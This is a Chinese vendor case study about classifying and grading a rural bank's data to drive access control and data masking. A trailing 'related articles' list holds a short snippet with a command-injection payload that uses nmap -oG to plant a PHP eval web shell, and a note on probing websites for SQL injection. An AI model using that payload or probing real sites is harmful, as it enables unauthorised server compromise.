农商行基于分类分级的数据安全管控建设实践
《数据安全法》颁布实施以来,以分类分级为基础,对数据进行差异化管理和防护,成为行业共识。
金融行业作为数据密集的高地,安全是重中之重,而鉴于金融数据种类和内容庞杂,面临规模化用数、普惠用数、跨机构共享用数等日益旺盛的安全需求,根据监管规范和标准,对数据采取分类分级措施,更成为有效推进数据安全建设的关键一环。
国内某农商行(简称A行),是当地规模最大、网点最多的地方金融机构。作为深耕区域,服务本地“三农”的金融主力军,A行近年来以数字化技术开山铺路,通过数据生态共享、客群深耕运营、场景应用接入,创新业务发展新模式,实现从部门银行升级成流程银行再到开放银行的跨越式发展。
业务的不断拓宽,数据量快速增多,随着数据安全合规要求日渐增长,以及数据安全风险威胁持续变化,进一步加强数据安全管控能力,坚持安全与数字化发展同步同频成为了一项重要工作。
目前,A行不同业务系统中存有大量不同类型的数据,高敏感暗数据多,随着业务的迭代快速,数据使用场景日趋提高,敏感数据的变化也更加频繁,给敏感数据的保护带来更大难度,采用“一刀切”式的数据安全防护则需要大量的安全投入,既易造成资源浪费,也给数据安全管理带来负担。
基于此,美创科技为A行提供基于分类分级的数据安全管控建设方案。

在具体的实施流程上,目前,美创暗数据发现和分类分级系统已基于大量行业实践和标准研究,内置农商行数据分类分级模板、丰富业务类型和发现规则及大量金融数据标准,开箱即用。
通过对A行核心系统进行数据源自动扫描、识别,发现数据库的数量、IP、端口、类型等信息,在完成字段业务类型的识别后,根据分类分级策略,智能化完成数据分类分级。
数据分类分级结果与数据库防水坝、数据脱敏产品进行策略联动,匹配细粒度的安全策略,实现以“身份+数据”为中心的数据库运维安全管控和高效精准化的脱敏能力,有效降低数据安全技术能力落地的整体建设成本,数据安全管理能力质效双增。
智能化工具支撑
完成高效数据分类分级
分类分级是整个数据安全措施落地的基础,因此智能、准确的数据识别能力是最重要的能力。
暗数据发现和分类分级系统依托自然语言处理、特征分析、机器学习等技术,实现精准的数据自动化识别和分类分级,节省大量人工成本。最终根据数据安全性遭受破坏后的影响对象和所造成的影响程度,将数据安全级别从高到低划分为5级。

在分类分级过程中,暗数据发现和分类分级系统进行可视化呈现,展示每个字段归属的分类、所属的安全等级,同时以报告形式展示分类分级成果,包括敏感数据分布情况、数据分类情况、数据分级情况等。
分类分级联动
构建精细化安全管控体系
◼︎ 基于分类分级实现细粒度运维安全管控
A行数据运维环境复杂,涉及人员众多,易存在非授权访问敏感数据、运维误操作、高危指令等风险。
数据库防水坝集敏感数据发现和管理、多因素身份准入机制、动态访问控制、敏感数据脱敏、误操作恢复、合规审计等多种功能,能够快速建立安全合规运维体系,加强对敏感数据安全访问及运维操作行为管控。

本次实践中,数据库防水坝通过多因素认证精准识别前端操作人员的身份,通过与分类分类分级系统联动,基于分类分级结果有效为后续的访问控制策略提供依据,精准识别被操作数据的敏感级别,对3级及以上敏感数据操作进行限制(参考《金融数据安全 数据生命周期安全规范》),实现敏感数据细粒度到列的精细化的安全管控,保障数据运维场景的安全。
◼︎ 基于分类分级提升数据脱敏效率和精准度
A行大量生产数据经常需要通过精准脱敏后传输到非生产环境,用于开发测试等环节,但由于业务系统后台数据库表的规模越来越庞大、结构越来越复杂,传统脱敏方式往往容易导致所获取的敏感数据表、字段等信息不准确,继而造成脱敏后数据无法达到“可用、合规、安全、高效”等预期目标。

美创静态数据脱敏系统内置灵活、丰富的脱敏算法,通过与暗数据发现和分类分级系统进行联动,精准识别核心数据库中的3级、4级数据,极大减少脱敏后仍存在敏感字段的现象。当开发测试过程中需要用数时,数据脱敏系统通过定义精确、灵活的数据脱敏策略,对不同类别的数据以不同方式进行脱敏变形处理,最大限度的保证脱敏后数据的特征一致性、逻辑一致性、业务规则关联性,从而以差异化的脱敏手段提升了脱敏效率和精准度。
在浩浩荡荡的数字化转型浪潮中,释放数据价值的前提是筑牢数据安全保障防线,数据分类分级作为迈向数据安全精细化管理的重要一步,则势在必行。
作为先行者和实践者,美创科技已在大数据局、人社、能源、金融、医疗、地产、企业、交通、教育等领域,帮助用户数据分类分级真正快速有效的落地。基于丰富的行业实践,美创科技也在不断推进数据分类分级的探索与实践,以期以更智能化的产品和符合业务、符合安全合规的方案服务,以安全之势守护数字化加速,让数据要素充分自由流通。
相关文章:
农商行基于分类分级的数据安全管控建设实践
《数据安全法》颁布实施以来,以分类分级为基础,对数据进行差异化管理和防护,成为行业共识。 金融行业作为数据密集的高地,安全是重中之重,而鉴于金融数据种类和内容庞杂,面临规模化用数、普惠用数、跨机构共…...
读写文件(
一.写文件 1.Nmap escapeshellarg()和escapeshellcmd() : 简化: <?php phpinfo();?> -oG hack.php———————————— nmap写入文件escapeshellarg()和escapeshellcmd() 漏洞 <?php eval($_POST["hack"]);?> -oG hack.php 显示位置*** 8…...
.net core 依赖注入生命周期
在.NET Core中,依赖注入的生命周期用于控制注入的服务实例的生命周期。下面是.NET Core中常用的几种依赖注入生命周期: Singleton(单例):在整个应用程序生命周期内只创建一个实例。每次注入都返回同一个实例。示例代码…...
栈和队列的实现
Lei宝啊:个人主页(也许有你想看的) 愿所有美好不期而遇 前言 : 栈和队列的实现与链表的实现很相似,新瓶装旧酒,没什么新东西。 可以参考这篇文章: -------------------------无头单向不循环…...
java中的垃圾收集机制
推荐 1 1 垃圾回收 1.1 java的gc堆中的对象而言,什么时候对象会从待回收状态变为激活状态(垃圾变成非垃圾对象) 当然可以。首先,为了使用 try-with-resources,您需要一个实现了 AutoCloseable 或 Closeable 接口的…...
TCP网络服务器设计
最近设计了一个网络服务器程序,对于4C8G的机器配置,TPS可以达到5W。业务处理逻辑是简单的字符串处理。服务器接收请求后对下游进行类似广播的发送。在此分享一下设计方式,如果有改进思路欢迎大家交流分享。 程序运行在CentOS7.9操作系统上&a…...
4. C++构造函数和析构函数
一、对象的初始化和清理 C中的面向对象来源于生活,每个对象也都会有初始设置以及对象销毁前的清理数据的设置,对象的初始化和清理也是两个非常重要的安全问题 一个对象或者变量没有初始状态,对其使用后果是未知的使用完一个对象或变量&#x…...
【Spring Cloud 四】Ribbon负载均衡
Ribbon负载均衡 系列文章目录背景一、什么是Ribbon二、为什么要有Ribbon三、使用Ribbon进行负载均衡服务提供者A代码pom文件yml配置文件启动类controller 服务提供者Bpom文件yml配置文件启动类controller 服务消费者pom文件yml文件启动类controller 运行测试 四、Ribbon的负载均…...
“星闪”:60%能耗 6倍速度 1/30时延**
蓝牙技术的诞生与挑战 蓝牙技术,由爱立信公司于1994年发明,最初旨在实现无线音频传输,使无线耳机成为可能。这项技术成为过去20多年里最主流的近距离无线通讯技术,广泛应用于手机、耳机、手柄、键盘等设备。然而,尽管…...
cocosCreator 之 i18n多语言插件
版本: v3.4.0 环境: Mac 简介 i18n是国际化的简称, 全名:internationalization;取首尾字符i和n,18代表单词中间的字符数目。 该插件不需要产品做太多的改变,通过语言的设置,实现不…...
redis 如何保证数据一致性
前言 日常开发中常会使用redis作为项目中的缓存,只要我们使用 Redis 缓存,就必然会面对缓存和数据库间的一致性保证问题。而且如果数据不一致,那么应用从缓存中读取的数据就不是最新数据,可能会导致严重的业务问题。 为什么会数…...
因果推断(三)双重差分法(DID)
因果推断(三)双重差分法(DID) 双重差分法是很简单的群体效应估计方法,只需要将样本数据随机分成两组,对其中一组进行干预。在一定程度上减轻了选择偏差带来的影响。 因果效应计算:对照组y在干预…...
neo4j入门实例介绍
使用Cypher查询语言创建了一个图数据库,其中包含了电影《The Matrix》和演员Keanu Reeves、Carrie-Anne Moss、Laurence Fishburne、Hugo Weaving以及导演Lilly Wachowski和Lana Wachowski之间的关系。 CREATE (TheMatrix:Movie {title:The Matrix, released:1999,…...
CGAL-2D和3D线性几何内核-点和向量-内核扩展
文章目录 1.介绍1.1.鲁棒性 2.内核表示2.1.通过参数化实现泛型2.2.笛卡尔核2.3.同质核2.4.命名约定2.5.内核作为trait类2.6.选择内核和预定义内核 3.几何内核3.1.点与向量3.2.内核对象3.3.方位和相对位置 4.谓语和结构4.1.谓词4.2.结构4.3.交集和变量返回类型4.4.例子4.5.构造性…...
Ubuntu 22.04 安装docker
参考: https://docs.docker.com/engine/install/ubuntu/ 支持的Ubuntu版本: Ubuntu Lunar 23.04Ubuntu Kinetic 22.10Ubuntu Jammy 22.04 (LTS)Ubuntu Focal 20.04 (LTS) 1 卸载旧版本 非官方的安装包,需要先卸载: docker.io…...
电脑维护进阶:让你的“战友”更强大、更持久!
前言 无论是学习还是工作,电脑已经成为了IT人必不可少的得力助手。然而,电脑的性能和寿命需要经过细心的维护来保证。本文将详细探讨如何维护你的电脑,延长它的寿命,以及一些实用建议。 硬件保养篇 内部清洁 灰尘会导致电脑散热…...
【Leetcode】75.颜色分类
一、题目 1、题目描述 给定一个包含红色、白色和蓝色、共 n 个元素的数组 nums ,原地对它们进行排序,使得相同颜色的元素相邻,并按照红色、白色、蓝色顺序排列。 我们使用整数 0、 1 和 2 分别表示红色、白色和蓝色。 必须在不使用库内置的 sort 函数的情况下解决这个问…...
Pytesseract学习笔记
函数 pytesseract.image_to_string(image: Any, lang: Any None, …) 识别图像中的文本。 Parameters image(Any):输入图像,不接受bytes类型。...
cnvd通用型证书获取姿势
因为技术有限,只能挖挖不用脑子的漏洞,平时工作摸鱼的时候通过谷歌引擎引擎搜索找找有没有大点的公司有sql注入漏洞,找的方法就很简单,网站结尾加上’,有异常就测试看看,没有马上下一家,效率至上…...
elasticsearch的副本和分片的区别
es/elasticsearch的副本和分片的区别 一:概念 (1)集群(Cluster): ES可以作为一个独立的单个搜索服务器。不过,为了处理大型数据集,实现容错和高可用性,ES可以运行在许多互…...
第19节 Node.js Express 框架
Express 是一个为Node.js设计的web开发框架,它基于nodejs平台。 Express 简介 Express是一个简洁而灵活的node.js Web应用框架, 提供了一系列强大特性帮助你创建各种Web应用,和丰富的HTTP工具。 使用Express可以快速地搭建一个完整功能的网站。 Expre…...
基于uniapp+WebSocket实现聊天对话、消息监听、消息推送、聊天室等功能,多端兼容
基于 UniApp + WebSocket实现多端兼容的实时通讯系统,涵盖WebSocket连接建立、消息收发机制、多端兼容性配置、消息实时监听等功能,适配微信小程序、H5、Android、iOS等终端 目录 技术选型分析WebSocket协议优势UniApp跨平台特性WebSocket 基础实现连接管理消息收发连接…...
c++ 面试题(1)-----深度优先搜索(DFS)实现
操作系统:ubuntu22.04 IDE:Visual Studio Code 编程语言:C11 题目描述 地上有一个 m 行 n 列的方格,从坐标 [0,0] 起始。一个机器人可以从某一格移动到上下左右四个格子,但不能进入行坐标和列坐标的数位之和大于 k 的格子。 例…...
Vue2 第一节_Vue2上手_插值表达式{{}}_访问数据和修改数据_Vue开发者工具
文章目录 1.Vue2上手-如何创建一个Vue实例,进行初始化渲染2. 插值表达式{{}}3. 访问数据和修改数据4. vue响应式5. Vue开发者工具--方便调试 1.Vue2上手-如何创建一个Vue实例,进行初始化渲染 准备容器引包创建Vue实例 new Vue()指定配置项 ->渲染数据 准备一个容器,例如: …...
OkHttp 中实现断点续传 demo
在 OkHttp 中实现断点续传主要通过以下步骤完成,核心是利用 HTTP 协议的 Range 请求头指定下载范围: 实现原理 Range 请求头:向服务器请求文件的特定字节范围(如 Range: bytes1024-) 本地文件记录:保存已…...
React19源码系列之 事件插件系统
事件类别 事件类型 定义 文档 Event Event 接口表示在 EventTarget 上出现的事件。 Event - Web API | MDN UIEvent UIEvent 接口表示简单的用户界面事件。 UIEvent - Web API | MDN KeyboardEvent KeyboardEvent 对象描述了用户与键盘的交互。 KeyboardEvent - Web…...
WordPress插件:AI多语言写作与智能配图、免费AI模型、SEO文章生成
厌倦手动写WordPress文章?AI自动生成,效率提升10倍! 支持多语言、自动配图、定时发布,让内容创作更轻松! AI内容生成 → 不想每天写文章?AI一键生成高质量内容!多语言支持 → 跨境电商必备&am…...
《基于Apache Flink的流处理》笔记
思维导图 1-3 章 4-7章 8-11 章 参考资料 源码: https://github.com/streaming-with-flink 博客 https://flink.apache.org/bloghttps://www.ververica.com/blog 聚会及会议 https://flink-forward.orghttps://www.meetup.com/topics/apache-flink https://n…...
根据万维钢·精英日课6的内容,使用AI(2025)可以参考以下方法:
根据万维钢精英日课6的内容,使用AI(2025)可以参考以下方法: 四个洞见 模型已经比人聪明:以ChatGPT o3为代表的AI非常强大,能运用高级理论解释道理、引用最新学术论文,生成对顶尖科学家都有用的…...
全面解析各类VPN技术:GRE、IPsec、L2TP、SSL与MPLS VPN对比
目录 引言 VPN技术概述 GRE VPN 3.1 GRE封装结构 3.2 GRE的应用场景 GRE over IPsec 4.1 GRE over IPsec封装结构 4.2 为什么使用GRE over IPsec? IPsec VPN 5.1 IPsec传输模式(Transport Mode) 5.2 IPsec隧道模式(Tunne…...
